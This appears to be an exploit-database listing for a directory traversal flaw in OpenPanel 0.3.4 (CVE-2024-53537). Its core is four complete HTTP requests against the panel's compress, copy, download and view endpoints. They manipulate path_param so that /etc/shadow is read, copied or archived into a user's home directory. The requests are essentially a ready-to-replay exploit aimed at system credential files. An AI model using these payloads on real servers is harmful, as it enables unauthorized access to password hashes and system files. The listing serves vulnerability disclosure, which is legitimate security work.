OpenPanel 0.3.4 - Directory Traversal

🗓️ 14 Apr 2025 00:00:00Reported by Korn Chaisuwan, Charanin Thongudom, Pongtorn AngsuchotmeteeType

exploitdb🔗 www.exploit-db.com👁 232 Views

OpenPanel 0.3.4 suffers directory traversal vulnerability allowing unauthorized file access.

Reporter	Title	Published	Views	Family All 11
0day.today	OpenPanel 0.3.4 Directory Traversal Vulnerability	30 Jan 202500:00	–	zdt
Circl	CVE-2024-53537	31 Jan 202516:16	–	circl
CNNVD	OpenPanel 安全漏洞	31 Jan 202500:00	–	cnnvd
CVE	CVE-2024-53537	31 Jan 202500:00	–	cve
Cvelist	CVE-2024-53537	31 Jan 202500:00	–	cvelist
EUVD	EUVD-2024-51988	3 Oct 202520:07	–	euvd
NVD	CVE-2024-53537	31 Jan 202516:15	–	nvd
OSV	CVE-2024-53537	31 Jan 202516:15	–	osv
Packet Storm	OpenPanel 0.3.4 Directory Traversal	29 Jan 202500:00	–	packetstorm
RedhatCVE	CVE-2024-53537	23 May 202507:10	–	redhatcve

# Exploit Title: OpenPanel 0.3.4 - Directory Traversal 
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537

### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar

### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers


###  Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers


### View Function ### 
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

14 Apr 2025 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.19.1

EPSS0.0222

SSVC